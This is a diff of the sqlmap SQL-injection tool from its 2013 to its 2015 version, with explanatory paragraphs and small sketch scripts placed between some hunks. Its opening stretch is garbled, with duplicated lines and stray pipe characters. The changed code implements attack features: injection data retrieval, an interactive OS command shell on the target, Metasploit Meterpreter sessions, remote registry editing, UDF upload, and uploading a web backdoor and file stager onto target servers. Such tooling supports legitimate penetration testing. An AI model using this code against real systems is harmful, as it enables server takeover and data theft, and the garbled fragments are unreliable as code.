|
vector = vector.replace("[INFERENCE]", expression)
|
||||||
query = agent.prefixQuery(vector)
|
query = agent.prefixQuery(vector)
|
||||||
query = agent.suffixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
|
|
||||||
timeBasedCompare = kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)
|
timeBasedCompare = kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)
|
||||||
|
|
||||||
output = hashDBRetrieve(expression, checkConf=True)
|
output = hashDBRetrieve(expression, checkConf=True)
|
||||||
|
@ -333,6 +344,9 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
|
||||||
getCurrentThreadData().disableStdOut = suppressOutput
|
getCurrentThreadData().disableStdOut = suppressOutput
|
||||||
|
|
||||||
try:
|
try:
|
||||||
|
pushValue(conf.db)
|
||||||
|
pushValue(conf.tbl)
|
||||||
|
|
||||||
if expected == EXPECTED.BOOL:
|
if expected == EXPECTED.BOOL:
|
||||||
forgeCaseExpression = booleanExpression = expression
|
forgeCaseExpression = booleanExpression = expression
|
||||||
|
|
||||||
|
@ -357,10 +371,34 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
|
||||||
if not conf.forceDns:
|
if not conf.forceDns:
|
||||||
if union and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
|
if union and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
|
||||||
kb.technique = PAYLOAD.TECHNIQUE.UNION
|
kb.technique = PAYLOAD.TECHNIQUE.UNION
|
||||||
value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
|
kb.forcePartialUnion = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector[8]
|
||||||
|
fallback = not expected and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL and not kb.forcePartialUnion
|
||||||
|
|
||||||
|
try:
|
||||||
|
value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
|
||||||
|
except SqlmapConnectionException:
|
||||||
|
if not fallback:
|
||||||
|
raise
|
||||||
|
|
||||||
count += 1
|
count += 1
|
||||||
found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE
|
found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE
|
||||||
|
|
||||||
|
if not found and fallback:
|
||||||
|
warnMsg = "something went wrong with full UNION "
|
||||||
|
warnMsg += "technique (could be because of "
|
||||||
|
warnMsg += "limitation on retrieved number of entries)"
|
||||||
|
if " FROM " in query.upper():
|
||||||
|
warnMsg += ". Falling back to partial UNION technique"
|
||||||
|
singleTimeWarnMessage(warnMsg)
|
||||||
|
|
||||||
|
pushValue(kb.forcePartialUnion)
|
||||||
|
kb.forcePartialUnion = True
|
||||||
|
value = _goUnion(query, unpack, dump)
|
||||||
|
found = (value is not None) or (value is None and expectingNone)
|
||||||
|
kb.forcePartialUnion = popValue()
|
||||||
|
else:
|
||||||
|
singleTimeWarnMessage(warnMsg)
|
||||||
|
|
||||||
if error and any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) and not found:
|
if error and any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) and not found:
|
||||||
kb.technique = PAYLOAD.TECHNIQUE.ERROR if isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) else PAYLOAD.TECHNIQUE.QUERY
|
kb.technique = PAYLOAD.TECHNIQUE.ERROR if isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) else PAYLOAD.TECHNIQUE.QUERY
|
||||||
value = errorUse(forgeCaseExpression if expected == EXPECTED.BOOL else query, dump)
|
value = errorUse(forgeCaseExpression if expected == EXPECTED.BOOL else query, dump)
|
||||||
|
@ -404,14 +442,18 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
|
||||||
finally:
|
finally:
|
||||||
kb.resumeValues = True
|
kb.resumeValues = True
|
||||||
|
|
||||||
|
conf.tbl = popValue()
|
||||||
|
conf.db = popValue()
|
||||||
|
|
||||||
if suppressOutput is not None:
|
if suppressOutput is not None:
|
||||||
getCurrentThreadData().disableStdOut = popValue()
|
getCurrentThreadData().disableStdOut = popValue()
|
||||||
|
|
||||||
kb.safeCharEncode = False
|
kb.safeCharEncode = False
|
||||||
|
|
||||||
if not kb.testMode and value is None and Backend.getDbms() and conf.dbmsHandler:
|
if not kb.testMode and value is None and Backend.getDbms() and conf.dbmsHandler and not conf.noCast and not conf.hexConvert:
|
||||||
warnMsg = "in case of continuous data retrieval problems you are advised to try "
|
warnMsg = "in case of continuous data retrieval problems you are advised to try "
|
||||||
warnMsg += "a switch '--no-cast' or switch '--hex'"
|
warnMsg += "a switch '--no-cast' "
|
||||||
|
warnMsg += "or switch '--hex'" if Backend.getIdentifiedDbms() not in (DBMS.ACCESS, DBMS.FIREBIRD) else ""
|
||||||
singleTimeWarnMessage(warnMsg)
|
singleTimeWarnMessage(warnMsg)
|
||||||
|
|
||||||
return extractExpectedValue(value, expected)
|
return extractExpectedValue(value, expected)
|
||||||
|
@ -434,7 +476,7 @@ def goStacked(expression, silent=False):
|
||||||
query = agent.prefixQuery(";%s" % expression)
|
query = agent.prefixQuery(";%s" % expression)
|
||||||
query = agent.suffixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
Request.queryPage(payload, content=False, silent=silent, noteResponseTime=False, timeBasedCompare=True)
|
Request.queryPage(payload, content=False, silent=silent, noteResponseTime=False, timeBasedCompare="SELECT" in (payload or "").upper())
|
||||||
|
|
||||||
def checkBooleanExpression(expression, expectingNone=True):
|
def checkBooleanExpression(expression, expectingNone=True):
|
||||||
return getValue(expression, expected=EXPECTED.BOOL, charsetType=CHARSET_TYPE.BINARY, suppressOutput=True, expectingNone=expectingNone)
|
return getValue(expression, expected=EXPECTED.BOOL, charsetType=CHARSET_TYPE.BINARY, suppressOutput=True, expectingNone=expectingNone)
|
||||||
|
|
|
@@ -1,17 +1,16 @@
#!/usr/bin/env python

"""
- Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+ Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import urllib2


class MethodRequest(urllib2.Request):
- '''
+ """
Used to create HEAD/PUT/DELETE/... requests with urllib2
- '''
+ """

def set_method(self, method):
self.method = method.upper()

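The class above builds on the usual urllib2 trick of overriding get_method() so that a Request can carry verbs other than GET and POST. A self-contained Python 2 variant for illustration (not sqlmap's exact file):

    import urllib2

    class MethodRequest(urllib2.Request):
        def set_method(self, method):
            self.method = method.upper()

        def get_method(self):
            # urllib2 asks get_method() for the verb, so honour the explicit one if set
            return getattr(self, "method", urllib2.Request.get_method(self))

    req = MethodRequest("http://www.example.com/resource", data="key=value")
    req.set_method("PUT")
    print(req.get_method())   # PUT
    # urllib2.urlopen(req) would now issue a PUT request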
@@ -1,7 +1,7 @@
#!/usr/bin/env python

"""
- Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+ Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

@@ -10,14 +10,13 @@ import urllib2

from lib.core.data import conf

- class HTTPSCertAuthHandler(urllib2.HTTPSHandler):
+ class HTTPSPKIAuthHandler(urllib2.HTTPSHandler):
- def __init__(self, key_file, cert_file):
+ def __init__(self, key_file):
urllib2.HTTPSHandler.__init__(self)
self.key_file = key_file
- self.cert_file = cert_file

def https_open(self, req):
return self.do_open(self.getConnection, req)

def getConnection(self, host, timeout=None):
- return httplib.HTTPSConnection(host, key_file=self.key_file, cert_file=self.cert_file, timeout=conf.timeout)
+ return httplib.HTTPSConnection(host, key_file=self.key_file, timeout=conf.timeout)
@@ -1,7 +1,7 @@
#!/usr/bin/env python

"""
- Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+ Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

@@ -1,13 +1,17 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

+import types
 import urllib2
 import urlparse

+from StringIO import StringIO
+
+from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.common import getHostHeader
@@ -57,8 +61,8 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):

 kb.resendPostOnRedirect = choice.upper() == 'Y'

 if kb.resendPostOnRedirect:
 self.redirect_request = self._redirect_request

 def _redirect_request(self, req, fp, code, msg, headers, newurl):
 newurl = newurl.replace(' ', '%20')
@@ -103,17 +107,47 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
 logger.log(CUSTOM_LOGGING.TRAFFIC_IN, redirectMsg)

 if redurl:
-if not urlparse.urlsplit(redurl).netloc:
-redurl = urlparse.urljoin(req.get_full_url(), redurl)
+try:
+if not urlparse.urlsplit(redurl).netloc:
+redurl = urlparse.urljoin(req.get_full_url(), redurl)

 self._infinite_loop_check(req)
 self._ask_redirect_choice(code, redurl, req.get_method())
+except ValueError:
+redurl = None
+result = fp

 if redurl and kb.redirectChoice == REDIRECTION.YES:
 req.headers[HTTP_HEADER.HOST] = getHostHeader(redurl)
 if headers and HTTP_HEADER.SET_COOKIE in headers:
-req.headers[HTTP_HEADER.COOKIE] = headers[HTTP_HEADER.SET_COOKIE].split(DEFAULT_COOKIE_DELIMITER)[0]
-result = urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers)
+req.headers[HTTP_HEADER.COOKIE] = headers[HTTP_HEADER.SET_COOKIE].split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)[0]
+try:
+result = urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers)
+except urllib2.HTTPError, e:
+result = e
+
+# Dirty hack for http://bugs.python.org/issue15701
+try:
+result.info()
+except AttributeError:
+def _(self):
+return getattr(self, "hdrs") or {}
+result.info = types.MethodType(_, result)
+
+if not hasattr(result, "read"):
+def _(self, length=None):
+return e.msg
+result.read = types.MethodType(_, result)
+
+if not getattr(result, "url", None):
+result.url = redurl
+
+if not getattr(result, "code", None):
+result.code = 999
+except:
+redurl = None
+result = fp
+fp.read = StringIO("").read
 else:
 result = fp
@@ -128,5 +162,5 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
 def _infinite_loop_check(self, req):
 if hasattr(req, 'redirect_dict') and (req.redirect_dict.get(req.get_full_url(), 0) >= MAX_SINGLE_URL_REDIRECTIONS or len(req.redirect_dict) >= MAX_TOTAL_REDIRECTIONS):
 errMsg = "infinite redirect loop detected (%s). " % ", ".join(item for item in req.redirect_dict.keys())
-errMsg += "please check all provided parameters and/or provide missing ones."
+errMsg += "Please check all provided parameters and/or provide missing ones"
 raise SqlmapConnectionException(errMsg)
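The new error handling above works around http://bugs.python.org/issue15701 by taking the `HTTPError` raised during redirection and patching `info()` and `read()` onto it at runtime with `types.MethodType`, so later code can keep treating it like an ordinary response object. The following standalone Python 3 sketch (not sqlmap code; `FakeError` and its attributes are illustrative) shows that pattern in isolation:

```python
# Sketch: attach missing bound methods to an existing object at runtime.
import types

class FakeError(Exception):
    """Stands in for an exception object that lacks info()/read()."""
    def __init__(self, msg, hdrs=None):
        super().__init__(msg)
        self.msg = msg
        self.hdrs = hdrs

result = FakeError("Found", hdrs={"Location": "/login"})

if not hasattr(result, "info"):
    def _info(self):
        # Fall back to whatever headers the object happens to carry
        return getattr(self, "hdrs", None) or {}
    result.info = types.MethodType(_info, result)

if not hasattr(result, "read"):
    def _read(self, length=None):
        # Expose the error message as the "body"
        return self.msg
    result.read = types.MethodType(_read, result)

print(result.info())  # {'Location': '/login'}
print(result.read())  # Found
```

The methods are bound to the single instance only, which is exactly what is needed when the broken object comes from a library call that cannot be subclassed after the fact.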
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
@@ -13,7 +13,7 @@ def getPageTemplate(payload, place):

 if payload and place:
 if (payload, place) not in kb.pageTemplates:
-page, _ = Request.queryPage(payload, place, content=True)
+page, _ = Request.queryPage(payload, place, content=True, raise404=False)
 kb.pageTemplates[(payload, place)] = (page, kb.lastParserStatus is None)

 retVal = kb.pageTemplates[(payload, place)]
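The hunk above keeps the page-template cache keyed by the `(payload, place)` pair and simply stops raising on 404 responses when the template is first fetched. A minimal sketch of that caching shape (not sqlmap code; `fetch_page` is a hypothetical stand-in for the real request call):

```python
# Sketch: fetch a page once per (payload, place) pair and reuse it afterwards.
_page_templates = {}

def fetch_page(payload, place):
    # Placeholder for the real HTTP request; a 404 would not raise here
    return "<html>template for %s at %s</html>" % (payload, place)

def get_page_template(payload, place):
    key = (payload, place)
    if key not in _page_templates:
        _page_templates[key] = fetch_page(payload, place)
    return _page_templates[key]

print(get_page_template("1 AND 1=1", "GET"))
```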
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
@@ -1,19 +1,24 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

+import sys
+
 from extra.safe2bin.safe2bin import safechardecode
 from lib.core.common import dataToStdout
 from lib.core.common import Backend
 from lib.core.common import getSQLSnippet
+from lib.core.common import getUnicode
 from lib.core.common import isStackingAvailable
 from lib.core.common import readInput
 from lib.core.data import conf
 from lib.core.data import logger
+from lib.core.enums import AUTOCOMPLETE_TYPE
 from lib.core.enums import DBMS
+from lib.core.enums import OS
 from lib.core.exception import SqlmapFilePathException
 from lib.core.exception import SqlmapUnsupportedFeatureException
 from lib.core.shell import autoCompletion
@@ -116,13 +121,14 @@ class Abstraction(Web, UDF, Xp_cmdshell):
 infoMsg += "'x' or 'q' and press ENTER"
 logger.info(infoMsg)

-autoCompletion(osShell=True)
+autoCompletion(AUTOCOMPLETE_TYPE.OS, OS.WINDOWS if Backend.isOs(OS.WINDOWS) else OS.LINUX)

 while True:
 command = None

 try:
 command = raw_input("os-shell> ")
+command = getUnicode(command, encoding=sys.stdin.encoding)
 except KeyboardInterrupt:
 print
 errMsg = "user aborted"
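The added `getUnicode(command, encoding=sys.stdin.encoding)` call decodes what the user typed into the interactive shell using the terminal's reported encoding before it is forwarded to the target. A hedged, standalone sketch of the same idea (not sqlmap code; `to_unicode` is an illustrative helper):

```python
# Sketch: decode bytes with the terminal's encoding, pass text through unchanged.
import sys

def to_unicode(value, encoding=None):
    if isinstance(value, bytes):
        # sys.stdin.encoding can be None when input is piped, hence the fallback
        return value.decode(encoding or sys.getdefaultencoding() or "utf-8", "replace")
    return value

print(to_unicode(b"dir C:\\", encoding=sys.stdin.encoding))
```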
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
@@ -65,7 +65,16 @@ class Metasploit:
 self._msfPayload = normalizePath(os.path.join(conf.msfPath, "msfpayload"))

 if IS_WIN:
-_ = normalizePath(os.path.join(conf.msfPath, "..", "scripts", "setenv.bat"))
+_ = conf.msfPath
+while _:
+if os.path.exists(os.path.join(_, "scripts")):
+_ = os.path.join(_, "scripts", "setenv.bat")
+break
+else:
+old = _
+_ = normalizePath(os.path.join(_, ".."))
+if _ == old:
+break
 self._msfCli = "%s & ruby %s" % (_, self._msfCli)
 self._msfEncode = "ruby %s" % self._msfEncode
 self._msfPayload = "%s & ruby %s" % (_, self._msfPayload)
@@ -510,7 +519,7 @@ class Metasploit:
 timeout = time.time() - start_time > METASPLOIT_SESSION_TIMEOUT

 if not initialized:
-match = re.search("session ([\d]+) opened", out)
+match = re.search("Meterpreter session ([\d]+) opened", out)

 if match:
 self._loadMetExtensions(proc, match.group(1))
@@ -520,7 +529,6 @@ class Metasploit:
 time.sleep(2)

 initialized = True
-
 elif timeout:
 proc.kill()
 errMsg = "timeout occurred while attempting "
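Instead of assuming `setenv.bat` sits one level above `conf.msfPath`, the new code walks up parent directories until it finds a `scripts` subdirectory or reaches the filesystem root. A standalone sketch of that walk (not sqlmap code; the function name and the temporary directory layout below are illustrative only):

```python
# Sketch: climb towards the root until a "scripts" subdirectory is found.
import os
import tempfile

def find_setenv(base_path):
    current = os.path.normpath(base_path)
    while True:
        candidate = os.path.join(current, "scripts")
        if os.path.isdir(candidate):
            return os.path.join(candidate, "setenv.bat")
        parent = os.path.normpath(os.path.join(current, os.pardir))
        if parent == current:  # reached the filesystem root; give up
            return None
        current = parent

# Self-contained demo: build <tmp>/metasploit/scripts and search from two levels deeper
root = tempfile.mkdtemp()
os.makedirs(os.path.join(root, "metasploit", "scripts"))
os.makedirs(os.path.join(root, "metasploit", "apps", "pro"))
print(find_setenv(os.path.join(root, "metasploit", "apps", "pro")))
```

The `parent == current` check is what keeps the loop from spinning forever once the root is reached, mirroring the `if _ == old: break` guard in the hunk above.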
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
@@ -10,6 +10,7 @@ import os
 from lib.core.common import randomStr
 from lib.core.data import conf
 from lib.core.data import logger
+from lib.core.enums import REGISTRY_OPERATION

 class Registry:
 """
@@ -49,11 +50,11 @@ class Registry:
 def _createLocalBatchFile(self):
 self._batPathFp = open(self._batPathLocal, "w")

-if self._operation == "read":
+if self._operation == REGISTRY_OPERATION.READ:
 lines = self._batRead
-elif self._operation == "add":
+elif self._operation == REGISTRY_OPERATION.ADD:
 lines = self._batAdd
-elif self._operation == "delete":
+elif self._operation == REGISTRY_OPERATION.DELETE:
 lines = self._batDel

 for line in lines:
@@ -70,7 +71,7 @@ class Registry:
 os.unlink(self._batPathLocal)

 def readRegKey(self, regKey, regValue, parse=False):
-self._operation = "read"
+self._operation = REGISTRY_OPERATION.READ

 Registry._initVars(self, regKey, regValue, parse=parse)
 self._createRemoteBatchFile()
@@ -90,7 +91,7 @@ class Registry:
 return data

 def addRegKey(self, regKey, regValue, regType, regData):
-self._operation = "add"
+self._operation = REGISTRY_OPERATION.ADD

 Registry._initVars(self, regKey, regValue, regType, regData)
 self._createRemoteBatchFile()
@@ -103,7 +104,7 @@ class Registry:
 self.delRemoteFile(self._batPathRemote)

 def delRegKey(self, regKey, regValue):
-self._operation = "delete"
+self._operation = REGISTRY_OPERATION.DELETE

 Registry._initVars(self, regKey, regValue)
 self._createRemoteBatchFile()
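This hunk swaps scattered string literals ("read", "add", "delete") for the shared `REGISTRY_OPERATION` constants, so a typo shows up as an `AttributeError` rather than a silently unmatched branch. A minimal sketch of the same idea (not sqlmap code; the constants class and the placeholder batch lines are illustrative):

```python
# Sketch: group operation names in one constants holder instead of repeating strings.
class REGISTRY_OPERATION:
    READ = "read"
    ADD = "add"
    DELETE = "delete"

def batch_lines(operation):
    if operation == REGISTRY_OPERATION.READ:
        return ["reg query <key> /v <value>"]
    elif operation == REGISTRY_OPERATION.ADD:
        return ["reg add <key> /v <value> /t <type> /d <data>"]
    elif operation == REGISTRY_OPERATION.DELETE:
        return ["reg delete <key> /v <value> /f"]
    raise ValueError("unknown registry operation: %r" % operation)

print(batch_lines(REGISTRY_OPERATION.READ))
```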
@@ -1,13 +1,14 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

 import os

 from lib.core.agent import agent
+from lib.core.common import checkFile
 from lib.core.common import dataToStdout
 from lib.core.common import Backend
 from lib.core.common import isStackingAvailable
@@ -146,6 +147,7 @@ class UDF:

 if len(self.udfToCreate) > 0:
 self.udfSetRemotePath()
+checkFile(self.udfLocalFile)
 written = self.writeFile(self.udfLocalFile, self.udfRemoteFile, "binary", forceCheck=True)

 if written is not True:
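The added `checkFile(self.udfLocalFile)` call fails fast if the local UDF library is missing before any remote write is attempted. A short sketch of that guard (not sqlmap code; `check_file`, `upload_udf` and `write_file` are hypothetical names):

```python
# Sketch: verify the local file exists and is readable before uploading it.
import os

def check_file(path):
    if not (path and os.path.isfile(path) and os.access(path, os.R_OK)):
        raise IOError("unable to read file '%s'" % path)

def upload_udf(local_path, remote_path, write_file):
    check_file(local_path)                      # fail fast with a clear error
    return write_file(local_path, remote_path)  # placeholder for the real binary write

print(upload_udf(__file__, "/tmp/lib_udf.so", lambda src, dst: True))
```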
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
@@ -9,6 +9,7 @@ import os
 import posixpath
 import re
 import StringIO
+import urlparse

 from tempfile import mkstemp

@@ -17,8 +18,8 @@ from lib.core.agent import agent
 from lib.core.common import arrayizeValue
 from lib.core.common import Backend
 from lib.core.common import extractRegexResult
-from lib.core.common import getDirs
-from lib.core.common import getDocRoot
+from lib.core.common import getAutoDirectories
+from lib.core.common import getManualDirectories
 from lib.core.common import getPublicTypeMembers
 from lib.core.common import getSQLSnippet
 from lib.core.common import getUnicode
@@ -41,10 +42,12 @@ from lib.core.enums import DBMS
 from lib.core.enums import OS
 from lib.core.enums import PAYLOAD
 from lib.core.enums import WEB_API
+from lib.core.exception import SqlmapNoneDataException
 from lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT
 from lib.core.settings import EVENTVALIDATION_REGEX
 from lib.core.settings import VIEWSTATE_REGEX
 from lib.request.connect import Connect as Request
+from thirdparty.oset.pyoset import oset


 class Web:
@@ -128,7 +131,7 @@ class Web:
 return False

 def _webFileInject(self, fileContent, fileName, directory):
-outFile = posixpath.normpath("%s/%s" % (directory, fileName))
+outFile = posixpath.join(ntToPosixSlashes(directory), fileName)
 uplQuery = getUnicode(fileContent).replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
 query = ""

@@ -194,165 +197,166 @@ class Web:
 self.webApi = choices[int(choice) - 1]
 break

-kb.docRoot = arrayizeValue(getDocRoot())
-directories = sorted(getDirs())
+directories = list(arrayizeValue(getManualDirectories()))
+directories.extend(getAutoDirectories())
+directories = list(oset(directories))

 backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi)
 backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi))

-stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
 stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
 success = False

-for docRoot in kb.docRoot:
-if success:
-break
+for directory in directories:
+if not directory:
+continue

-for directory in directories:
-uriPath = ""
+stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
+self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)

-if not all(isinstance(_, basestring) for _ in (docRoot, directory)):
-continue
+uploaded = False
+directory = ntToPosixSlashes(normalizePath(directory))

-directory = ntToPosixSlashes(normalizePath(directory)).replace("//", "/").rstrip('/')
-docRoot = ntToPosixSlashes(normalizePath(docRoot)).replace("//", "/").rstrip('/')
+if not isWindowsDriveLetterPath(directory) and not directory.startswith('/'):
+directory = "/%s" % directory
+else:
+directory = directory[2:] if isWindowsDriveLetterPath(directory) else directory

-# '' or '/' -> 'docRoot'
-if not directory:
-localPath = docRoot
-uriPath = '/'
-# 'dir1/dir2/dir3' -> 'docRoot/dir1/dir2/dir3'
-elif not isWindowsDriveLetterPath(directory) and directory[0] != '/':
-localPath = "%s/%s" % (docRoot, directory)
-uriPath = "/%s" % directory
-else:
-localPath = directory
-uriPath = directory[2:] if isWindowsDriveLetterPath(directory) else directory
+if not directory.endswith('/'):
+directory += '/'

-if docRoot in uriPath:
-uriPath = uriPath.replace(docRoot, "/")
-uriPath = "/%s" % normalizePath(uriPath)
-else:
-webDir = extractRegexResult(r"//[^/]+?/(?P<result>.*)/.", conf.url)
+# Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE method
+infoMsg = "trying to upload the file stager on '%s' " % directory
+infoMsg += "via LIMIT 'LINES TERMINATED BY' method"
+logger.info(infoMsg)
+self._webFileInject(stagerContent, stagerName, directory)

-if webDir:
-uriPath = "/%s" % webDir
-else:
-continue
+for match in re.finditer('/', directory):
+self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/'))
+self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName)
+debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl
+logger.debug(debugMsg)

-localPath = posixpath.normpath(localPath).rstrip('/')
-uriPath = posixpath.normpath(uriPath).rstrip('/')
-
-# Upload the file stager with the LIMIT 0, 1 INTO OUTFILE technique
-infoMsg = "trying to upload the file stager on '%s' " % localPath
-infoMsg += "via LIMIT INTO OUTFILE technique"
-logger.info(infoMsg)
-self._webFileInject(stagerContent, stagerName, localPath)
-
-self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, uriPath)
-self.webStagerUrl = "%s/%s" % (self.webBaseUrl, stagerName)
-self.webStagerFilePath = ntToPosixSlashes(normalizePath("%s/%s" % (localPath, stagerName))).replace("//", "/").rstrip('/')

 uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
 uplPage = uplPage or ""

-# Fall-back to UNION queries file upload technique
-if "sqlmap file uploader" not in uplPage:
-warnMsg = "unable to upload the file stager "
-warnMsg += "on '%s'" % localPath
-singleTimeWarnMessage(warnMsg)
+if "sqlmap file uploader" in uplPage:
+uploaded = True
+break

-if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
-infoMsg = "trying to upload the file stager on '%s' " % localPath
-infoMsg += "via UNION technique"
-logger.info(infoMsg)
+# Fall-back to UNION queries file upload method
+if not uploaded:
+warnMsg = "unable to upload the file stager "
+warnMsg += "on '%s'" % directory
+singleTimeWarnMessage(warnMsg)

-handle, filename = mkstemp()
-os.fdopen(handle).close()  # close low level handle (causing problems later)
+if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
+infoMsg = "trying to upload the file stager on '%s' " % directory
+infoMsg += "via UNION method"
+logger.info(infoMsg)

-with open(filename, "w+") as f:
-_ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
-_ = _.replace("WRITABLE_DIR", localPath.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else localPath)
-f.write(utf8encode(_))
+stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
+self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)

-self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True)
+handle, filename = mkstemp()
+os.fdopen(handle).close()  # close low level handle (causing problems later)
+
+with open(filename, "w+") as f:
+_ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
+_ = _.replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
+f.write(utf8encode(_))
+
+self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True)
+
+for match in re.finditer('/', directory):
+self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/'))
+self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName)
+
+debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl
+logger.debug(debugMsg)

 uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
 uplPage = uplPage or ""

-if "sqlmap file uploader" not in uplPage:
-continue
-else:
-continue
+if "sqlmap file uploader" in uplPage:
+uploaded = True
+break

-if "<%" in uplPage or "<?" in uplPage:
-warnMsg = "file stager uploaded on '%s', " % localPath
-warnMsg += "but not dynamically interpreted"
-logger.warn(warnMsg)
+if not uploaded:
+continue
+
+if "<%" in uplPage or "<?" in uplPage:
+warnMsg = "file stager uploaded on '%s', " % directory
+warnMsg += "but not dynamically interpreted"
+logger.warn(warnMsg)
+continue

+elif self.webApi == WEB_API.ASPX:
+kb.data.__EVENTVALIDATION = extractRegexResult(EVENTVALIDATION_REGEX, uplPage)
+kb.data.__VIEWSTATE = extractRegexResult(VIEWSTATE_REGEX, uplPage)
+
